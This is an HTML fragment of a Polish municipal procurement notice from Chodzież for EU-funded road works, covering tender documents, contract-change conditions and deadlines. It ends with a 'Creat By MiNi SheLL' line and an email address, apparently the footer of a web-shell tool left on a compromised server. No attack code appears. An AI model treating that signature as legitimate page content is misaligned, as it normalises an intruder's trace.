<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo
2. Parafowany wzór  umowy
3. Kosztorys</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy w przypadku  wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia.  
I. Zmiana terminu realizacji przedmiotu umowy  
I.1. 	zmiany spowodowane warunkami atmosferycznymi, w szczególności:
      a) klęski żywiołowe;
b) warunki atmosferyczne uniemożliwiające prowadzenie robót budowlanych, przeprowadzanie   prób i sprawdzeń, dokonywanie odbiorów;
I.2.	 	zmiany będące następstwem okoliczności leżących po stronie Zamawiającego 		  	w szczególności:
a) wstrzymanie robót przez Zamawiającego;
b) konieczność usunięcia błędów lub wprowadzenia zmian w  dokumentacji projektowej; 
I.3.	zmiany będące następstwem działania organów administracji, w szczególności:
a) przekroczenie zakreślonych przez prawo terminów wydawania przez organy administracji 	decyzji, zezwoleń, itp.;
b) odmowa wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek błędów w dokumentacji projektowej.
	W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt I.1 - I.3 termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności. 
II. Zmiana sposobu spełnienia świadczenia
II.1 zmiany technologiczne, w szczególności:
a)	konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań  technicznych/technologicznych niż wskazane w dokumentacji projektowej, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem projektu,
b)	konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych lub 	materiałowych ze względu na zmiany obowiązującego prawa 
Zmiany wskazywane w lit b) będą wprowadzane wyłącznie w zakresie umożliwiającym oddanie przedmiotu umowy do użytkowania, a Zamawiający może ponieść ryzyko zwiększenia wynagrodzenia z tytułu takich zmian wyłącznie w kwocie równej zwiększonym z tego powodu kosztom. 
II.2. 	Zmiany osobowe
zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami i kwalifikacjami, o których mowa w ustawie Prawo budowlane lub innych ustawach, a także SIWZ, będzie wymagała również zaakceptowania przez Zamawiającego.

III. Pozostałe zmiany 
a)	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;
b)	 zmiana obowiązującej stawki VAT; Jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku zapłaconego przez wykonawcę. 
c)	zmiana sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub 	wytycznych dotyczących realizacji projektu
d) rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim 	przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami.
e)	kolizja z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami. W takim przypadku zmiany w umowie zostaną ograniczone do zmian koniecznych powodujących uniknięcie kolizji, a wynagrodzenie zostanie ustalone z zachowaniem zasady opisanej w lit d)
f)	zmiany uzasadnione okolicznościami o których mowa w art. 357.1 Kc z uwzględnieniem faktu, że za rażącą zostanie uznana strata w wysokości, o której mowa w art. 397 ksh. 
IV. Wszystkie powyższe postanowienia stanowią katalog zmian na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.
V. 	Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zm.):
a)	zmiana danych związanych z obsługą administracyjno- organizacyjną Umowy (np. zmiana nr rachunku bankowego) 
b)	zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów miedzy 	Stronami;
c)	udzielenie zamówień dodatkowych określonych w przepisach o zamówieniach publicznych .</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.chodziez.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.chodziez.pl - Biuletyn Informacji Publicznej.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.01.2012 godzina 11:00, miejsce: Urząd Miejski w Chodzieży, ul. Paderewskiego 2, 64-800 Chodzież.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Regionalny Program Operacyjny Województwa Wielkopolskiego na lata 2007-2013
Działanie 2.2 Poprawa dostępności do regionalnego i ponadregionalnego układu drogowego (drogi wojewódzkie w miastach na prawach powiatu, powiatowe i gminne)
Schemat II Drogi w granicach administracyjnych miast poniżej 50 tys. mieszkańców oraz na obszarach wiejskich.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com